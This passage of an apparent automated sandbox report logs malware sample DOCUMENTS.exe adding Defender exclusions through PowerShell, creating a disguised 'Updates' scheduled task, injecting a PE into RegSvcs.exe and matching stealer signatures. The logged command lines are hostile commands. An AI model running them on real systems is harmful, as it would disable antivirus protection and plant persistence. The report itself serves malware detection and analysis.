                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98767
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98516
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98405
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98293
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                      Source: RegSvcs.exe, 00000012.00000002.2541816900.0000000005D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                      Source: RegSvcs.exe, 0000000D.00000002.1401122800.0000000006530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F71C5D rdtsc 18_2_05F71C5D
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11B4008
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 816008
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Users\user\Desktop\DOCUMENTS.exe VolumeInformation
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Queries volume information: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPE
